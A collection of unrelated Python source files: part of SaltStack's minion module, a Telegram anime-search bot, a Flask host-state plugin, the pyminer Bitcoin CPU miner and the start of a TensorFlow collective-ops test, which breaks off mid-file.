self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the recieve calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event %s', event['tag'])
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.is_jid(event['tag']) and 'return' in event['data']:
if not 'jid' in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if not 'retcode' in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
if functions is None:
functions = salt.loader.minion_mods(self.opts)
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if type(tgt) != str:
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delim=':'):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt, delim=delim)
def grain_pcre_match(self, tgt, delim=':'):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delim=delim, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def exsel_match(self, tgt):
'''
Runs a function and return the exit code
'''
if tgt not in self.functions:
return False
return self.functions[tgt]()
def pillar_match(self, tgt, delim=':'):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'], tgt, delim=delim)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules()
|
animehive.py
|
import os
import json
import datetime
import threading
from multiprocessing import Pool
import pymongo
import telegram
from telegram import KeyboardButton, ReplyKeyboardMarkup
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import CallbackQueryHandler
from telegram.ext import MessageHandler, Filters
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from extras import *
config = json.load(open("config.json"))
bot = telegram.Bot(token=config["token"])
updater = Updater(token=config["token"], use_context=True)
dispatcher = updater.dispatcher
client = pymongo.MongoClient(config["db"]["host"], config["db"]["port"])
db = client[config["db"]["db_name"]]
def launch_broadcast(args):
try:
bot.send_message(chat_id=args[0], text=args[1])
except:
pass
def latest_anime(context, chat_id):
anime_list = fetch_gogoanime_latest()
for anime in anime_list:
try:
markup = [[InlineKeyboardButton(
"Download Anime 🚀", callback_data="d=" + anime["href"])]]
context.bot.send_photo(
chat_id=chat_id, caption=f"{anime['name']} {anime['episode']}", photo=anime["image"], reply_markup=InlineKeyboardMarkup(markup))
except:
pass
def echo_thread(update, context):
chat_id = update.effective_chat.id
bot_user = db.users.find_one({"chat_id": chat_id})
last_command = bot_user["last_command"]
if last_command == "recommend":
title = update.message.text.strip()
anime_list = search_animepahe(title)
if len(anime_list) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_search"])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"])
else:
context.bot.send_message(
chat_id=chat_id, text="Displaying search results for {} 😁".format(title))
for anime in anime_list:
markup = [[InlineKeyboardButton(
"Get Recommendations 🚀", callback_data="r=" + anime["session"])]]
context.bot.send_photo(chat_id=chat_id, photo=anime["poster"], caption=config["messages"]["recommendation_search"].format(
anime["title"], anime["type"], anime["status"], "{} {}".format(anime["season"], anime["year"])), reply_markup=InlineKeyboardMarkup(markup))
elif last_command == "download":
title = update.message.text.strip()
anime_list = search_gogoanime(title)
if len(anime_list) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_search"])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"])
else:
context.bot.send_message(
chat_id=chat_id, text="Displaying search results for {} 😁".format(title))
for anime in anime_list:
try:
markup = [[InlineKeyboardButton(
"Get Episodes 🚀", callback_data="d=" + anime["href"])]]
context.bot.send_photo(
chat_id=chat_id, caption=f"{anime['title']}\n{anime['released']}", photo=anime["image"], reply_markup=InlineKeyboardMarkup(markup))
except:
pass
elif last_command == "get_info":
title = update.message.text.strip()
anime_list = search_animepahe(title)
if len(anime_list) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_search"])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"])
else:
for anime in anime_list:
markup = [[InlineKeyboardButton(
"Get Anime Info ℹ️", callback_data="i=" + anime["session"])]]
context.bot.send_photo(chat_id=chat_id, photo=anime["poster"], caption=config["messages"]["recommendation_result"].format(
anime["title"], anime["status"], "{} {}".format(anime["season"], anime["year"])), reply_markup=InlineKeyboardMarkup(markup))
elif last_command == "broadcast":
if bot_user.get("admin"):
message = update.message.text
users = [[i["chat_id"], message] for i in db.users.find({})]
with Pool(5) as p:
result = p.map(launch_broadcast, users)
bot.send_message(
chat_id=chat_id, text="Finished sending broadcast message to users")
else:
if bot_user.get("admin"):
context.bot.send_message(chat_id=chat_id, text=update.message.text)
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["unknown"])
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def button_thread(update, context):
chat_id = update.effective_chat.id
query_data = update.callback_query.data
if query_data.split("=")[0] == "r":
try:
title, recommendations = fetch_animepahe_recommendations(
query_data.split("=")[1])
if len(recommendations) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_recommendation"])
else:
db.recommendations.insert_many([{"chat_id": chat_id, "anime": query_data.split("=")[
1], "session": i["session"], "date": datetime.datetime.now()} for i in recommendations])
context.bot.send_message(
chat_id=chat_id, text="Showing recommendations for {} 😇".format(title))
for i in recommendations:
markup = [[InlineKeyboardButton(
"Get Anime Info ℹ️", callback_data="i=" + i["session"])]]
context.bot.send_photo(chat_id=chat_id, photo=i["image"], caption=config["messages"]["recommendation_result"].format(
i["title"], i["status"], i["season"]), reply_markup=InlineKeyboardMarkup(markup))
except:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_recommendation"])
if query_data.split("=")[0] == "d":
total_episodes, alias, anime_id = fetch_gogoanime_anime(
query_data.split("=")[1])
markup = []
for i in range(0, total_episodes, 10):
markup.append([InlineKeyboardButton("Download Episodes {} - {}".format(i + 1, min(
i + 10, total_episodes)), callback_data="f={}={}={}".format(alias, anime_id, i))])
context.bot.send_message(chat_id=chat_id, text=config["messages"]["download_pagination"].format(
total_episodes), reply_markup=InlineKeyboardMarkup(markup))
if query_data.split("=")[0] == "f":
start = int(query_data.split("=")[3])
alias = query_data.split("=")[1]
episodes = fetch_gogoanime_episodes(
start, start + 10, alias, query_data.split("=")[2])
markup = []
for i in episodes:
markup.append([InlineKeyboardButton(os.path.basename(i["href"]).replace(
"-", " "), callback_data="g={}".format(i["href"]))])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["select_episode"], reply_markup=InlineKeyboardMarkup(markup))
if query_data.split("=")[0] == "g":
anime_title, download_links = fetch_gogoanime_download(
query_data.split("=")[1])
db.downloaded_anime.insert_one({
"title": anime_title,
"chat_id": chat_id,
"href": "https://gogoanime.so" + query_data.split("=")[1],
"date": datetime.datetime.now()
})
markup = []
for i in download_links:
markup.append([InlineKeyboardButton(i["name"], url=i["href"])])
context.bot.send_message(
chat_id=chat_id, text=anime_title, reply_markup=InlineKeyboardMarkup(markup))
if query_data.split("=")[0] == "i":
db.info.insert_one({"chat_id": chat_id, "anime": query_data.split("=")[
1], "date": datetime.datetime.now()})
anime_info = fetch_animepahe_info(query_data.split("=")[1])
markup = [[InlineKeyboardButton(
"Get Recommendations 🚀", callback_data="r=" + query_data.split("=")[1])]]
context.bot.send_photo(chat_id=chat_id, photo=anime_info["poster"])
context.bot.send_message(chat_id=chat_id, text=config["messages"]["anime_info"].format(
*list(anime_info.values())[1:-1] + [", ".join(anime_info["genre"])]), reply_markup=InlineKeyboardMarkup(markup))
def start(update, context):
chat_id = update.effective_chat.id
first_name = update["message"]["chat"]["first_name"]
if not db.users.find_one({"chat_id": chat_id}):
db.users.insert_one(
{"chat_id": chat_id, "last_command": None, "admin": False, "date": datetime.datetime.now()})
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["start"].format(first_name))
markup = ReplyKeyboardMarkup([[KeyboardButton("/download"), KeyboardButton("/recommend"), KeyboardButton("/latest")], [
KeyboardButton("/info"), KeyboardButton("/donate"), KeyboardButton("/help")]], resize_keyboard=True)
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"], reply_markup=markup)
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def donate(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["donate"])
context.bot.send_message(chat_id=chat_id, text=config["messages"]["menu"])
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def latest(update, context):
chat_id = update.effective_chat.id
thread = threading.Thread(target=latest_anime, args=[context, chat_id])
thread.start()
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def help(update, context):
chat_id = update.effective_chat.id
total_users = db.users.count_documents({})
total_downloaded = db.downloaded_anime.count_documents({})
total_recommendations = db.recommendations.count_documents({})
total_info = db.info.count_documents({})
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["help"].format(total_users, total_downloaded, total_recommendations, total_info))
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def recommend(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["recommend"])
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "recommend"}})
def download(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["download"])
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "download"}})
def get_info(update, context):
chat_id = update.effective_chat.id
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["get_info"])
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "get_info"}})
def broadcast(update, context):
chat_id = update.effective_chat.id
if db.users.find_one({"chat_id": chat_id}).get("admin"):
num_users = db.users.count_documents({})
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["broadcast"].format(num_users))
db.users.update_one({"chat_id": chat_id}, {
"$set": {"last_command": "broadcast"}})
def echo(update, context):
thread = threading.Thread(target=echo_thread, args=[update, context])
thread.start()
def button(update, context):
thread = threading.Thread(target=button_thread, args=[update, context])
thread.start()
start_handler = CommandHandler("start", start)
dispatcher.add_handler(start_handler)
donate_handler = CommandHandler("donate", donate)
dispatcher.add_handler(donate_handler)
help_handler = CommandHandler("help", help)
dispatcher.add_handler(help_handler)
latest_handler = CommandHandler("latest", latest)
dispatcher.add_handler(latest_handler)
recommend_handler = CommandHandler("recommend", recommend)
dispatcher.add_handler(recommend_handler)
download_handler = CommandHandler("download", download)
dispatcher.add_handler(download_handler)
get_info_handler = CommandHandler("info", get_info)
dispatcher.add_handler(get_info_handler)
broadcast_handler = CommandHandler("broadcast", broadcast)
dispatcher.add_handler(broadcast_handler)
echo_handler = MessageHandler(Filters.text & (~Filters.command), echo)
dispatcher.add_handler(echo_handler)
button_handler = CallbackQueryHandler(button)
dispatcher.add_handler(button_handler)
updater.start_polling()
|
manager.py
|
import os
import sched
import threading
import time
from flask import request, current_app
from .response_methods import make_response_content
from ..conf.config import HttpMethod, Constant
from ..exceptions import ErrorResponse
from ..exceptions.error_code import MsgCode
from ..exceptions.log_msg import ErrorMsg, InfoMsg
from ..models import model_init_app
from ..services import redis_conn
from ..services.host_status import query_flask_state_host, record_flask_state_host
from ..utils.auth import auth_user, auth_method
from ..utils.file_lock import Lock
from ..utils.format_conf import format_address, format_sec
from ..utils.logger import logger, DefaultLogger
ONE_MINUTE_SECONDS = 60
def init_app(app, interval=Constant.DEFAULT_SECONDS, log_instance=None):
"""
Plugin entry
:param app: Flask app
:param interval: record interval
:param log_instance: custom logger object
"""
logger.set(log_instance or DefaultLogger().get())
app.add_url_rule('/v0/state/hoststatus', endpoint='state_host_status', view_func=query_flask_state,
methods=[HttpMethod.POST.value])
init_db(app)
init_redis(app)
model_init_app(app)
# Timing recorder
interval = format_sec(interval)
t = threading.Thread(target=record_timer, args=(app, interval,))
t.setDaemon(True)
t.start()
def init_redis(app):
redis_state = app.config.get('REDIS_CONF', {})
if not redis_state.get('REDIS_STATUS'):
return
redis_conf_keys = ['REDIS_HOST', 'REDIS_PORT', 'REDIS_PASSWORD']
redis_conf = {key: value for key, value in redis_state.items() if key in redis_conf_keys}
redis_conn.set_redis(redis_conf)
def init_db(app):
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
if not app.config.get('SQLALCHEMY_BINDS', {}).get(Constant.DEFAULT_BIND_SQLITE):
raise KeyError(ErrorMsg.LACK_SQLITE.get_msg())
app.config['SQLALCHEMY_BINDS'][Constant.DEFAULT_BIND_SQLITE] = format_address(
app.config['SQLALCHEMY_BINDS'].get(Constant.DEFAULT_BIND_SQLITE))
def record_timer(app, interval):
app.lock_flask_state = Lock.get_file_lock()
with app.app_context():
try:
current_app.lock_flask_state.acquire()
logger.info(InfoMsg.ACQUIRED_LOCK.get_msg('. process ID: %d' % os.getpid()))
s = sched.scheduler(time.time, time.sleep)
in_time = time.time()
target_time = int(int((time.time()) / ONE_MINUTE_SECONDS + 1) * ONE_MINUTE_SECONDS)
time.sleep(ONE_MINUTE_SECONDS - in_time % ONE_MINUTE_SECONDS)
record_flask_state_host(interval)
while True:
target_time += interval
now_time = time.time()
s.enter(target_time - now_time, 1, record_flask_state_host, (interval,))
s.run()
except BlockingIOError:
pass
except Exception as e:
current_app.lock_flask_state.release()
raise e
@auth_user
@auth_method
def query_flask_state():
"""
Query the local state and redis status
:return: flask response
"""
try:
b2d = request.json
if not isinstance(b2d, dict):
logger.warning(ErrorMsg.DATA_TYPE_ERROR).get_msg(
'.The target type is %s, not %s' % (dict.__name__, type(b2d).__name__))
return make_response_content(ErrorResponse(MsgCode.JSON_FORMAT_ERROR))
time_quantum = b2d.get('timeQuantum')
return make_response_content(resp=query_flask_state_host(time_quantum))
except Exception as e:
logger.exception(e)
return make_response_content(ErrorResponse(MsgCode.UNKNOWN_ERROR), http_status=500)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8772
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
collective_ops_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import kernels
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
class CollectiveOpTest(test.TestCase):
def setUp(self):
context._reset_context() # pylint: disable=protected-access
super(CollectiveOpTest, self).setUp()
def _testCollectiveReduce(self,
inputs,
expected,
set_graph_key,
communication_hint='auto',
fp16=False,
instance_key=1,
merge_op='Add',
final_op='Div',
timeout=0,
reported_group_size=None):
group_key = 1
group_size = len(inputs)
if reported_group_size is None:
reported_group_size = group_size
device_type = 'CPU'
config = config_pb2.ConfigProto(device_count={device_type: group_size})
devices = ['/{}:{}'.format(device_type, i) for i in range(group_size)]
with self.session(config=config) as sess:
colred = []
for i in range(group_size):
with ops.device(devices[i]):
